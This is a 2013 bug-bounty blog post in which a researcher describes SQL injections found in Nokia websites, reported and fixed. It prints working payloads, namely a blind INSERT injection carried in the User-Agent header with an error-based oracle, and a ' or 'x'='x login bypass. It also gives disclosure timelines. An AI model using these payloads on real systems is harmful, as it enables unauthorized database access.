Tuesday 30 July 2013

SQL injections in Nokia sites.

Hello,

I have found out about Nokia security reward program somewhere mid-April. Reports of people getting one or more mobile phones made me interested and I started searching for bugs.
As usual XSS/CSRF did not bring people real reward (only Hall of Fame), I started looking for SQL injections (and SQL injections only).

In one week I have found total of 4 SQL injections in their sites, but will write about three of them as fourth one is fairly similar to one of these three.

So:

SQL injection in www4.nokia.de

Found this site using Google. The actual vulnerable link was:
http://www4.nokia.de/storelocator/

Vulnerable variable is the User-Agent header, there was no response on page except for blank or load, so it was blind SQL injection.

The query behind was INSERT INTO, MySQL was the database.
So, how do you exploit something like
INSERT INTO table(a,b,c)VALUES(1,2,'$user_agent')
if there is no error reporting, and you cannot see output from the database?

After trying to make valid PoC for 10 minutes, I did not know what to do. So, I asked one of my old friends, Bryan de Houwer. Few minutes later, he said "Hey, did you try inserting into multiple rows?"... I forgot that, for some reason.

You could do something like 
INSERT INTO table(a,b,c)VALUES(1,2,3),(4,5,6);
Great!
After some brute-forcing, I found out the INSERT query had 5 columns.

Setting my User-Agent to 
',1,1),(1,2,3,4,5)-- -

The site loaded, meaning the query worked.  


Now, you cannot use usual AND 3=23 in INSERT queries, as
 INSERT INTO a(b)VALUES(1 and 3=23);
is a valid query, and it will go through - meaning I cannot get any data. 

I needed some way to trigger error for true/false.


Now what?
One of my favorite blind SQL injection tricks is to make the database return multiple rows in a subquery.

For example, 
SELECT a,(select b from table) from table; 

will return "Subquery returns more than 1 row" - if there is more than one row, of course. 


Now, I used the UNION keyword to do the trick for me:

SELECT 1 UNION SELECT 2;
->  "Subquery returns more than 1 row";


with a CASE statement, my final injection looked like:


User-Agent: ',1,1),(1,2,3,4,(select 1 union select case when(substr(version(),1,1)=5) then 1 else 2 end))-- -
The page loads. 


User-Agent: ',1,1),(1,2,3,4,(select 1 union select case when(substr(version(),1,1)=4) then 1 else 2 end))-- -

Blank. See the change in version. 

Time-line:
22. April 2013 - Vulnerability reported.
22. April 2013 - Response from Nokia Team
23. April 2013 - Vulnerability fixed (That was pretty fast!)



 SQL injection in ***********

URL is hidden for now, as there is still one unpatched vulnerability. As soon as it gets patched, I am publishing it.
Found this site using **********
This is a PHP site from <2005. I think this told you enough.

Login using
User: ' or 'x'='x
Pass: 'or 'x'='x

From there, pretty much every SINGLE... well, everything was vulnerable to SQL injection.
The DB was PostgreSQL.
Error reporting was on.
Multiple queries, DROP/CREATE privileges, much like connecting to your database and sending your own queries.

Time-line:
23. April 2013 - Reported
23. April 2013 - Reply from Nokia Team
25. April 2013 - Fixed (took them some time to find login details).

Gotta love old, forgotten sites.

Nokia.es subdomain SQL injection

Got no idea how I found this one.
The injection is blind, time based.
PICTURES!




True: 



False:






Conclusion:

Fourth SQL injection is almost the same as first.

Nokia fixed those bugs really fast.

I was awarded a single Nokia Lumia 820 (yellow color, looks great and is an amazing phone) and the Top Reporter status for April.

Although those vulnerabilities were found in short time frame, and I was not really working my ass off, I have expected at least a Lumia 920 or another Lumia 820 - I know of people who got multiple phones for XSS/CSRF in similar domains.

I would like to thank the Nokia Incident Response Team for their quick fixes, and  Bryan de Houwer for reminding me of multiple inserts in SQL. 

No comments:

Post a Comment

Note: only a member of this blog may post a comment.